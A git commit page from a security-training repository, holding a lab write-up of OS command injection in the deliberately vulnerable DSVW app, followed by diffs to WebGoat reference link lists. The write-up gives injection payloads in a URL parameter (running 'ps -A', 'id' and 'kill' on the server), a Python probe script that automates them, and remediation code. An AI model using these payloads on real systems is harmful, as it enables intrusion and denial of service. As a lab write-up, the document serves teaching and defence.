Commit 6d1f8340 authored by Diego Restrepo Mesa's avatar Diego Restrepo Mesa

sol(vbd): #0 dsvw, 0077-os-command-injection

- discovered vulnerabilities: 1 by me, 3 already in repo, 4 total.
- total estimated vulnerabilities in system:   25
- discovery percentage:                        16%
- effort: 2 hours during immersion.
parent 9c84b02a
http://127.0.0.1:65412/?domain=www.google.com
\ No newline at end of file
## Version 1.4.1
## language: en
Feature:
TOE:
dsvw
Category:
OS Command Injection
Location:
http://127.0.0.1:65412/ - domain - (field)
CWE:
CWE-78: https://cwe.mitre.org/data/definitions/78.html
CWE-77: https://cwe.mitre.org/data/definitions/77.html
CWE-88: https://cwe.mitre.org/data/definitions/88.html
Rule:
REQ.173: https://fluidattacks.com/web/rules/173/
Goal:
Inject an OS command
Recommendation:
Use regex to validate user input
Background:
Hacker's software:
| <Software name> | <Version> |
| Ubuntu | 19.04 |
| Google Chrome | 75.0.3770.100 |
TOE information:
Given I am accessing the site http://127.0.0.1:65412/
And the server is running BaseHTTP version 0.3
And Python version 2.7.16
And SQLite version 3
Scenario: Normal use case
When I make the next request:
"""
GET http://127.0.0.1:65412/?domain=www.google.com HTTP/1.1
"""
Then I can get the following information:
"""
Server: 127.0.0.53
Address: 127.0.0.53#53
Non-authoritative answer:
Name: www.google.com
Address: 172.217.30.196
Name: www.google.com
Address: 2800:3f0:4005:401::2004
"""
Scenario: Static detection
When I look at the code of file DSVW\dsvw.py
"""
elif "domain" in params:
    content = subprocess.check_output("nslookup " + params["domain"], shell=True,
                                      stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
"""
Then I see that the domain parameter is concatenated into a shell command string and run with shell=True, with no validation at all
And I conclude that the site is susceptible to OS command injection
Scenario: Dynamic detection
When I see how the requests are made
"""
GET http://127.0.0.1:65412/?domain=www.google.com HTTP/1.1
"""
Then the domain parameter is passed through the url
When I append a shell metacharacter (a single quote) to the domain parameter
"""
GET http://127.0.0.1:65412/?domain=www.google.com ' HTTP/1.1
"""
Then the site returns the shell's own error message
"""
/bin/sh: 1: Syntax error: Unterminated quoted string
"""
Then I can conclude that the domain parameter reaches a shell and is a possible attack vector
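A small probe client, added here as an example (it is not part of DSVW or of this write-up), that automates the Dynamic detection step: it sends a set of shell-metacharacter payloads in the domain parameter, percent-encodes them, and classifies each reply by the shell error or the reflected command output it contains. The target URL, the parameter name and the use of `id` as the injected command are assumptions; the sample replies are constructed from the bodies quoted above so that `demo()` runs offline.

```python
import re
import urllib.error
import urllib.parse
import urllib.request

# Probe payloads: shell metacharacters appended to an otherwise valid domain.
# "id" is the injected command because its output is easy to recognise.
PROBES = {
    "quote": "www.google.com '",
    "semicolon": "www.google.com ; id",
    "backtick": "www.google.com `id`",
    "subshell": "www.google.com $(id)",
}

# A POSIX shell choking on the command line (the first alternative is the exact
# text quoted in the Dynamic detection scenario), and "id" having actually run.
SHELL_ERROR_RE = re.compile(
    r"/bin/sh: \d+: Syntax error|Unterminated quoted string|sh: \d+: .+: not found")
EXEC_MARKER_RE = re.compile(r"\buid=\d+\(")


def build_probe_url(base, param, payload):
    # quote(), not urlencode()/quote_plus(): the space must become %20.  A server
    # that decodes with unquote() instead of unquote_plus() would hand a literal
    # "+" to the shell and the probe would be testing something else.
    return "%s?%s=%s" % (base, param, urllib.parse.quote(payload, safe=""))


def classify(body):
    """Label one response body by the strongest signal it carries."""
    if EXEC_MARKER_RE.search(body):
        return "command executed"
    if SHELL_ERROR_RE.search(body):
        return "shell error"
    return "no signal"


def http_fetch(url, timeout=5):
    # Read the body on 4xx/5xx as well: some targets report the failed command there.
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def probe(base, param="domain", fetch=http_fetch):
    """Send every probe and map its name to the classification of the reply."""
    return {name: classify(fetch(build_probe_url(base, param, payload)))
            for name, payload in PROBES.items()}


# Constructed sample replies (an offline stand-in for the target), modelled on
# the bodies quoted in the scenarios; the nslookup error text is illustrative.
SAMPLE_RESPONSES = {
    "www.google.com '": "/bin/sh: 1: Syntax error: Unterminated quoted string\n",
    "www.google.com ; id": "Name:\twww.google.com\nAddress: 172.217.30.196\n"
                           "uid=1000(dsvw) gid=1000(dsvw) groups=1000(dsvw)\n",
    # Word-split "id" output becomes extra nslookup arguments and is echoed back
    # inside its error message, so the command still provably ran.
    "www.google.com `id`": "nslookup: couldn't get address for 'uid=1000(dsvw)': not found\n",
    "www.google.com $(id)": "nslookup: couldn't get address for 'uid=1000(dsvw)': not found\n",
}


def demo():
    """Run probe() against the constructed replies instead of a live host."""
    def fake_fetch(url):
        query = urllib.parse.urlsplit(url).query
        return SAMPLE_RESPONSES[urllib.parse.unquote(query.split("=", 1)[1])]
    return probe("http://127.0.0.1:65412/", fetch=fake_fetch)


if __name__ == "__main__":
    print(demo())
```

`probe("http://127.0.0.1:65412/")` runs the same four requests against the live lab. The raw `GET ...?domain=www.google.com ' HTTP/1.1` lines in the scenarios only work from a browser because the browser percent-encodes the space for you; a scripted client has to do it explicitly, as `build_probe_url()` does.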
Scenario: Exploitation
When I make the next request:
"""
GET http://127.0.0.1:65412/?domain=www.google.com ; ps -A HTTP/1.1
"""
Then I get the list of processes running on the server:
"""
PID TTY TIME CMD
8922 pts/5 00:00:00 bash
14054 ? 00:00:00 python3
9105 ? 00:00:00 python3
9555 tty2 00:00:06 chrome
9716 tty 00:00:21 chrome
"""
When I make the next request:
"""
GET http://127.0.0.1:65412/?domain=www.google.com ; kill 14054 HTTP/1.1
"""
Then the web server process is killed and the service stops responding
Then I can conclude that the vulnerability has been exploited
Scenario: Remediation
When I validate the domain parameter with a regex before running the command:
"""
regex = r"^(?![0-9]+$)(?=([a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])))((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)*))$"
matches = re.match(regex, params["domain"])
if matches:
    content = subprocess.check_output("nslookup " + params["domain"], shell=True,
                                      stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
"""
When I make the next request:
"""
GET http://127.0.0.1:65412/?domain=www.google.com ; ps -A HTTP/1.1
"""
Then the site doesn't return anything, because the value fails the regex and the command is never run
Then I can confirm that the vulnerability was successfully patched
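An added example (not code from DSVW or from this write-up) that puts the vulnerable pattern from the Static detection scenario beside two fixes: the regex from the Remediation scenario, applied with `fullmatch()` instead of `match()`, and an argv list that removes the shell altogether. `printf %s` stands in for `nslookup` so the block runs offline; the payloads are constructed, and a POSIX shell plus a coreutils `printf` binary are assumed.

```python
import re
import subprocess

# Domain regex copied from the Remediation scenario: labels of letters, digits
# and hyphens joined by dots, and not a purely numeric string.
DOMAIN_RE = re.compile(
    r"^(?![0-9]+$)(?=([a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])))"
    r"((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?"
    r"(?:\.[a-zA-Z](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)*))$"
)


def is_valid_domain(domain):
    # fullmatch(), not match(): with match() the trailing "$" still accepts
    # "www.google.com\n", and a newline terminates a shell command line too.
    return DOMAIN_RE.fullmatch(domain) is not None


def lookup_vulnerable(domain):
    # The dsvw.py pattern: untrusted input concatenated into a shell string.
    # "printf %s" stands in for "nslookup" so this runs offline (assumes a
    # POSIX sh); ";", "`", "$(" and newlines inside `domain` are interpreted.
    return subprocess.check_output("printf %s " + domain, shell=True,
                                   stderr=subprocess.STDOUT).decode()


def lookup_argv(domain):
    # No shell at all: the list form hands `domain` to the program as exactly
    # one argument, whatever characters it contains (assumes coreutils printf).
    return subprocess.check_output(["printf", "%s", domain],
                                   stderr=subprocess.STDOUT).decode()


def lookup_hardened(domain):
    # Defence in depth: validate first, then run without a shell.
    if not is_valid_domain(domain):
        raise ValueError("invalid domain: %r" % domain)
    return lookup_argv(domain)


def compare(payload):
    """Run one constructed payload through all three variants."""
    try:
        hardened = lookup_hardened(payload)
    except ValueError as err:
        hardened = "rejected: %s" % err
    return {
        "vulnerable": lookup_vulnerable(payload),
        "argv_only": lookup_argv(payload),
        "hardened": hardened,
    }


if __name__ == "__main__":
    for payload in ("www.google.com", "x; echo INJECTED", "www.google.com\n"):
        print(repr(payload), compare(payload))
```

Running the same payload through the three variants shows why the two fixes belong together: `lookup_argv()` passes `x; echo INJECTED` to `printf` as one literal argument even with no validation, while `is_valid_domain()` also rejects the trailing-newline case that a `$`-anchored `match()` lets through. The patched snippet above keeps `shell=True` after validating, which leaves the regex as the only line of defence. Note that the regex is stricter than DNS: IP literals and names whose first label is a single character (for example `a.example.com`) fail it, which may or may not be acceptable for this feature.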
Scenario: Scoring
Severity scoring according to CVSSv3 standard
Base: Attributes that are constants over time and organizations
10/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Temporal: Attributes that measure the exploit's popularity and fixability
9.7/10 (Critical) - E:H/RL:W/RC:C
Environmental: Unique and relevant attributes to a specific user environment
8.9/10 (High) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H
Scenario: Correlations
No correlations have been found as of 2019-07-29
......@@ -11,4 +11,4 @@ https://www.youtube.com/watch?v=LqX20TF3h7A
https://www.youtube.com/watch?v=b6UCPXDl73I
https://klarsen.net/infosec/owasp-webgoat-xss-lessons/
https://github.com/shantisuresh01/WebGoat-Lessons/blob/master/dom-xss/src/main/resources/plugin/DOMXSS/lessonSolutions/en/DOMXSS.html
https://github.com/fmauri/WebGoatSolutions/blob/master/Cross-SiteScripting_XSS/README.md
......@@ -13,3 +13,4 @@ http://sweet.ua.pt/andre.zuquete/Aulas/Seguranca/14-15/docss/Ex2.pdf
http://shubhamhacker.blogspot.com/2018/02/walkthrough-hello-guys-this-is-shubham.html
https://gist.github.com/tylernchls/97f8e2e907c84cfdc908c6f0fced1ddc#xss-stored
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#cross-site-scripting-lesson-7-exercise
https://github.com/fmauri/WebGoatSolutions/blob/master/Cross-SiteScripting_XSS/README.md
......@@ -25,3 +25,6 @@ https://gist.github.com/tylernchls/97f8e2e907c84cfdc908c6f0fced1ddc
https://www.youtube.com/watch?v=Yr0TIF5YoNM
https://sithlab.tistory.com/650
https://dlsdn73.tistory.com/607
https://gist.github.com/tylernchls/97f8e2e907c84cfdc908c6f0fced1ddc#sql-injection-advanced
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#sql-injection-advanced-lesson-3-exercise
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#sql-injection-advanced-lesson-5-exercise
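Review bot: the first added line of this hunk, https://gist.github.com/tylernchls/97f8e2e907c84cfdc908c6f0fced1ddc#sql-injection-advanced, points at a gist that the file already lists without the fragment (the context shown after the @@ header is that same gist URL); consider replacing the bare entry with the anchored one rather than keeping both, so the list has one entry per source.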
......@@ -16,3 +16,6 @@ https://www.youtube.com/watch?v=up5z9kOgDB0
https://www.youtube.com/watch?v=9e4Q_p9Nuq8&list=PLrHVSJmDPvlqxCfBhPuksHdpViPyeZTsF&index=8
https://sithlab.tistory.com/649
https://sithlab.tistory.com/647
https://gist.github.com/tylernchls/97f8e2e907c84cfdc908c6f0fced1ddc#string-injection
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#sql-injection-lesson-7-exercise
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#sql-injection-lesson-8-exercise
......@@ -10,3 +10,4 @@ https://www.freebuf.com/column/169739.html
https://www.youtube.com/watch?v=G9l_rxYGkqM
https://www.youtube.com/watch?v=r7WG1xiFwj4
https://raw.githubusercontent.com/TheoKlein/WebGoat-Solution/master/Injection_Flaws/Numeric_SQL_Injection.md
https://github.com/fmauri/WebGoatSolutions/blob/master/InjectionFlaws/SqlInjection.md
......@@ -13,3 +13,4 @@ http://www.voidcn.com/article/p-dbhadgks-su.html
https://ephrain.net/security-webgoat-的-xss-與-sql-injection-初階練習/
https://www.youtube.com/watch?v=4iFIJ8IAcRc
https://raw.githubusercontent.com/TheoKlein/WebGoat-Solution/master/Injection_Flaws/String_SQL_Injection.md
https://github.com/fmauri/WebGoatSolutions/blob/master/InjectionFlaws/SqlInjection.md
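Review bot: while touching this list, the context line https://ephrain.net/security-webgoat-的-xss-與-sql-injection-初階練習/ carries raw non-ASCII path characters; since these files are plain link lists that get pasted into shells and tools, the percent-encoded form a browser produces when copying the address would be more robust.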